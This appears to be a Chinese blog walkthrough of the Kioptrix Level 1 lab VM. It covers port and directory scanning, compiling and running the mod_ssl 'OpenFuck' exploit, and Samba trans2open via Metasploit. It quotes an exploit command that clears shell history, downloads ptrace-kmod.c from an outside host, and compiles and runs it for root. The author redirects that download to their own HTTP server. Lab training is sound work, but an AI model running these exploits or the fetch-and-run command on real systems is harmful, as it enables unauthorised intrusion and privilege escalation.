Kioptrix这个系列靶机默认是桥接模式,如果我们kali使用NAT是扫描不到靶机的,通过VM的靶机网络设置也不能更改成功。

解决方式:每次下载好靶机先不导入VM,如果已经导入,需要“移除”靶机;然后通过修改靶机目录中的vm配置文件,删除所有ethernet0为首的行,之后,导入VM中,重新添加网络适配器并选择NAT模式,这样kali就能扫描到靶机了

kali IP:192.168.1.128

靶机IP:192.168.1.130

sudo nmap --min-rate 10000 -p- 192.168.1.130

Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-17 10:27 CST

Nmap scan report for 192.168.1.130

Host is up (0.0023s latency).

Not shown: 65529 closed tcp ports (reset)

PORT     STATE SERVICE

22/tcp   open  ssh

80/tcp   open  http

111/tcp  open  rpcbind

139/tcp  open  netbios-ssn

443/tcp  open  https

1024/tcp open  kdm


sudo nmap -sT -sV -O -p22,80,111,139,443,1024 192.168.1.130

Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-17 10:40 CST

Nmap scan report for 192.168.1.130

Host is up (0.00036s latency).

PORT     STATE SERVICE     VERSION

22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)

80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

111/tcp  open  rpcbind     2 (RPC #100000)

139/tcp  open  netbios-ssn Samba smbd (workgroup: yMYGROUP)

443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

1024/tcp open  status      1 (RPC #100024)

MAC Address: 00:0C:29:7C:3A:16 (VMware)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose

Running: Linux 2.4.X

OS CPE: cpe:/o:linux:linux_kernel:2.4

OS details: Linux 2.4.9 - 2.4.18 (likely embedded)

Network Distance: 1 hop

mod_ssl,OpenSSL,rpcbind,Samba 都可以进行尝试

搜索了一下rpcbind只有拒绝服务。

sudo nmap -sU -p22,80,111,139,443,1024 192.168.1.130

Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-17 10:42 CST

Nmap scan report for 192.168.1.130

Host is up (0.00025s latency).

PORT     STATE  SERVICE

22/udp   closed ssh

80/udp   closed http

111/udp  open   rpcbind

139/udp  closed netbios-ssn

443/udp  closed https

1024/udp closed unknown

UDP扫描一下有没有遗漏的服务

访问80端口和443端口,发现网络架构相同,和nmap扫描出的服务相同。

扫描目录:

sudo dirb http://192.168.1.130

-----------------

DIRB v2.22

By The Dark Raver

-----------------

START_TIME: Fri Aug 18 10:18:03 2023

URL_BASE: http://192.168.1.130/

WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.130/ ----

+ http://192.168.1.130/~operator (CODE:403|SIZE:273)

+ http://192.168.1.130/~root (CODE:403|SIZE:269)

+ http://192.168.1.130/cgi-bin/ (CODE:403|SIZE:272)

+ http://192.168.1.130/index.html (CODE:200|SIZE:2890)

==> DIRECTORY: http://192.168.1.130/manual/

==> DIRECTORY: http://192.168.1.130/mrtg/

==> DIRECTORY: http://192.168.1.130/usage/                                                                                  

---- Entering directory: http://192.168.1.130/manual/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.130/mrtg/ ----

+ http://192.168.1.130/mrtg/index.html (CODE:200|SIZE:17318)                                                                

---- Entering directory: http://192.168.1.130/usage/ ----

+ http://192.168.1.130/usage/index.html (CODE:200|SIZE:4261)

radhat的默认首页和配置文档 没有利用点

看了一下apache 1.3.20有什么漏洞可以利用

searchsploit apache 1.3.20

mod_ssl=2.8.4<2.8.7,尝试使用

searchsploit -m 47080.c

  Exploit: Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)

      URL: https://www.exploit-db.com/exploits/47080

     Path: /usr/share/exploitdb/exploits/unix/remote/47080.c

File Type: C source, ASCII text

gcc -o exploit 47080.c -lcrypto

47080.c:21:10: fatal error: openssl/ssl.h: 没有那个文件或目录

   21 | #include <openssl/ssl.h>

      |          ^~~~~~~~~~~~~~~

compilation terminated.

下载依赖库之后重新编译

exploit中符合要求有0x6a,0x6b

sudo ./exploit 0x6a 192.168.1.130 -c 50

*******************************************************************

* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *

*******************************************************************

* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *

* #hackarena  irc.brasnet.org                                     *

* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *

* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *

* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *

*******************************************************************

Connection... 50 of 50

Establishing SSL connection

cipher: 0x4043808c   ciphers: 0x80f8068

Ready to send shellcode

Spawning shell...

Good Bye!

 sudo ./exploit 0x6b 192.168.1.130 -c 50

*******************************************************************

* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *

*******************************************************************

* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *

* #hackarena  irc.brasnet.org                                     *

* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *

* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *

* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *

*******************************************************************

Connection... 50 of 50

Establishing SSL connection

cipher: 0x4043808c   ciphers: 0x80f8068

Ready to send shellcode

Spawning shell...


bash: no job control in this shell

bash-2.05$

d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo

--23:19:52--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

           => `ptrace-kmod.c'

Connecting to dl.packetstormsecurity.net:443...

dl.packetstormsecurity.net: Host not found.

gcc: ptrace-kmod.c: No such file or directory

gcc: No input files

rm: cannot remove `ptrace-kmod.c': No such file or directory

bash: ./exploit: No such file or directory

bash-2.05$

检查权限

uname -a

Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown

whoami;id

apache

uid=48(apache) gid=48(apache) groups=48(apache)

百度说是这个.c文件获取外网文件被墙 导致获取的不是root权限

Samba尝试 尝试了下 只有最有一个对139端口进行攻击 其他的利用模块都是针对mamba的服务端口443进行攻击的

use exploit/linux/samba/

Matching Modules

================

   #  Name                                     Disclosure Date  Rank       Check  Description

   -  ----                                     ---------------  ----       -----  -----------

   0  exploit/linux/samba/setinfopolicy_heap   2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow

   1  exploit/linux/samba/chain_reply          2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)

   2  exploit/linux/samba/is_known_pipename    2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load

   3  exploit/linux/samba/lsa_transnames_heap  2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow

   4  exploit/linux/samba/trans2open           2003-04-07       great      No     Samba trans2open Overflow (Linux x86)

一般来说 系统赋予smb服务为root权限

samba/setinfopolicy_heap 信息策略审计时间堆溢出

Samba chain_reply内存损坏漏洞:该漏洞利用代码会损坏Samba 3.3.13以前版本中分配给响应数据包的内存,可通过传递超过目标缓冲区大小的值实现。

samba/is_known_pipename CVE-2017-7494,Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。Samba 允许连接一个远程的命名管道,并且在连接前会调用 is_known_pipename() 函数验证管道名称是否合法。在 is_known_pipename() 函数中,pipename并没有检查管道名称中的部分特殊字符,加载了使用该名称的动态链接库。导致攻击者可以构造一个恶意的动态链接库文件,执行任意代码。

Samba lsa_io_trans_names Heap Overflow 堆溢出

Samba trans2open溢出:这是Samba2.2.0版本到2.2.8版本中普遍存在的一个缓冲区溢出漏洞,其工作原理是利用没有noexec栈选项的x86 Linux机器中的漏洞。

配置好后run借助samba直接能拿到root权限

继续之前的mod_ssl进行,根据网上的思路 可以在128访问外网下载 exploit中130需访问的外网文件,通过更改exploit中,使130访问128临时开启的80端口下载文件,执行expoit获取root权限。

nl 47080.c|grep ptrace

    8   * Note: if required, host ptrace and replace wget target

  308  #define COMMAND2 "unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit; \n"

wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

--2023-08-18 09:29:59--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

正在解析主机 dl.packetstormsecurity.net (dl.packetstormsecurity.net)... 198.84.60.200

正在连接 dl.packetstormsecurity.net (dl.packetstormsecurity.net)|198.84.60.200|:443... 已连接。

已发出 HTTP 请求,正在等待回应... 200 OK

长度:3921 (3.8K) [text/x-csrc]

正在保存至: “ptrace-kmod.c”

ptrace-kmod.c                      100%[================================================================>]   3.83K  --.-KB/s  用时 0s      

2023-08-18 09:30:01 (131 MB/s) - 已保存 “ptrace-kmod.c” [3921/3921])

编写 47080.c ,然后重新编译,临时开启128的80服务,同时执行exploit

python3 -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

192.168.1.130 - - [18/Aug/2023 09:37:16] "GET /ptrace-kmod.c HTTP/1.0" 200 -

Kioptrix Level 1的更多相关文章

  1. Kioptrix Level 2

    简介 Vulnhub是一个提供各种漏洞环境的靶场平台. 个人学习目的:1,方便学习更多类型漏洞.2,为OSCP做打基础. 下载链接 https://www.vulnhub.com/entry/kiop ...

  2. vulnhub 靶机 Kioptrix Level 1渗透笔记

    靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ kali ip 信息收集 先使用nmap收集目标的ip地址 nmap -sP 1 ...

  3. OSCP Learning Notes - Enumeration(1)

    Installing Kioptrix: Level 1 Download the vm machine form https://www.vulnhub.com/entry/kioptrix-lev ...

  4. OSCP Learning Notes - Exploit(1)

    Gaining Root with Metasploit Platform: Kali Linux, Kioptrix Level 1 1. Find the IP of Kioptirx nmap ...

  5. OSCP Learning Notes - Capstone(1)

    Kioptrix Level 1.1 Walkthrough Preparation: Download the virtual machine  from the following website ...

  6. OSCP Learning Notes - Post Exploitation(4)

    Pivoting 1. Edit the virtual network settings of the Vmware. 2. Set the Network Adapter(s) of Kali L ...

  7. OSCP Learning Notes - Post Exploitation(1)

    Linux Post Exploitation Target Sever: Kioptrix Level 1 1. Search the payloads types. msfvenom -l pay ...

  8. OSCP Learning Notes - File Transfers(2)

    Metasploit Target Server: Kioptrix Level 1 (1) Start the Metasploit on Kali Linux. (2) Set the modul ...

  9. Java compiler level does not match解决方法

    从别的地方导入一个项目的时候,经常会遇到eclipse/Myeclipse报Description  Resource Path Location Type Java compiler level d ...

  10. Android requires compiler compliance level 5.0 or 6.0. Found '1.4' instead的解决办法

    今天在导入工程进Eclipse的时候竟然出错了,控制台输出的是: [2013-02-04 22:17:13 - takepicture] Android requires compiler compl ...

随机推荐

  1. WSGI实现支持多URL的WEB服务器

  2. 【从0开始编写webserver·基础篇#02】服务器的核心---I/O处理单元和任务类

    I/O处理单元和任务类 前面写了线程池,那么现在要考虑如何去使用该线程池了 注意,到目前为止,我们还是在解决web服务器的I/O处理单元 即负责处理客户连接,读写网络数据的部分 线程池属于 Web 服 ...

  3. linux 系统安全和应用

    目录 一.系统安全 二.账号安全 三.修改密码生效时间 四.强制下次登录成功时修改密码 五.历史命令 六.终端自动注销 七.wheel组 八.grub菜单密码 一.系统安全 原因:1.系统数据想要保护 ...

  4. go for range的坑

    package main import "fmt" func main() { ParseStudent() } type student struct { Name string ...

  5. harbor改造为https---血泪史

  6. qq飞车端游最全按键指法教学

    目录 起步篇 超级起步 弹射起步 段位起步 基础篇 点飘 撞墙漂移 撞墙点喷 进阶篇 双喷 叠喷 断位漂移 段位双喷 侧身漂移 快速出弯 CW WCW CWW 牵引 甩尾点飘 甩尾漂移 右侧卡 左侧卡 ...

  7. 喜报 | ShowMeBug获国家高新技术企业认证!

    近日,深圳至简天成科技有限公司(以下简称至简天成)顺利通过国家高新技术企业认证! 国家高新技术企业是由国务院主导.科技部牵头的国家级荣誉资质,是我国科技类企业中的"国"字号招牌,完 ...

  8. AI作画本地搭建

    前言 Novel AI (简称NAI)是一个线上的深度学习小说续写平台,而 NAI Diffusion 是 NAI 在2022年10月3日推出的基于 Stable Diffusion 算法的自动生成二 ...

  9. CompletableFuture之批量上传

    前言 最近接到一个需求,批量上传图片到服务器及实时更新上传进度.当处理大量文件上传任务时,效率是一个关键因素.传统的串行方式会导致任务耗时较长,而使用并发处理可以极大地提高上传效率.想到很久之前用Co ...

  10. Java扩展Nginx之二:编译nginx-clojure源码

    欢迎访问我的GitHub 这里分类和汇总了欣宸的全部原创(含配套源码):https://github.com/zq2599/blog_demos 为什么要编译nginx-clojure源码 作为< ...